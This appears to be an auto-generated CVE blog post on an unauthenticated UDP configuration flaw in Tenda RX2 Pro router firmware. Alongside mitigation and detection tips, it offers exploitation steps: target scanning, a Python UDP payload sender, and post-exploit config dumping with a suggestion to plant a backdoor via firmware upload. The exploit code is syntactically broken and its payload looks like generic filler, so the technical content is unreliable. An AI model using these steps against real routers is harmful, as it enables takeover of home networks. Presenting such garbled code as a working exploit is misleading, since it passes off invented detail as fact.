Listen to this Post
How CVE-2025-46629 Works
The vulnerability exists in the `ate` management binary of Tenda RX2 Pro firmware version 16.03.30.14. Due to missing access controls, an unauthenticated attacker can send a crafted UDP packet to the router when the `ate` service is enabled. This allows remote configuration changes without authentication, potentially leading to network compromise, DNS hijacking, or credential theft. The exploit leverages improper validation in the UDP handler, permitting arbitrary command execution.
DailyCVE Form:
Platform: Tenda RX2 Pro
Version: 16.03.30.14
Vulnerability: Unauthenticated config change
Severity: Critical
Date: 05/27/2025
Prediction: Patch by 07/15/2025
What Undercode Say:
Exploitation:
- Identify Target: Scan for Tenda RX2 Pro routers (UDP port 49152).
2. Craft Malicious Packet:
import socket
payload = b"\x41\x42\x43\x44" + b"admin=1&passwd=" + b"A"500
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, ("192.168.1.1", 49152))
3. Trigger Configuration Overwrite: Send payload to bypass authentication.
Mitigation:
1. Disable `ate` Service:
killall ate
2. Block UDP Port:
iptables -A INPUT -p udp --dport 49152 -j DROP
3. Update Firmware: Monitor Tenda’s official patches.
Detection:
1. Log Analysis: Check for unexpected UDP traffic:
grep "49152" /var/log/messages
2. Network Monitoring: Alert on UDP bursts to port 49152.
Reverse Engineering:
- Binary Analysis: Use Ghidra to inspect `ate` binary for flawed logic.
- Debugging: Attach `gdb` to trace malformed packet handling.
Post-Exploit:
- Dump Config:
curl http://192.168.1.1/goform/getConfig
- Persistence: Inject backdoor via firmware upload.
References:
- MITRE CVE-2025-46629
- Tenda Security Advisory (Pending)
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
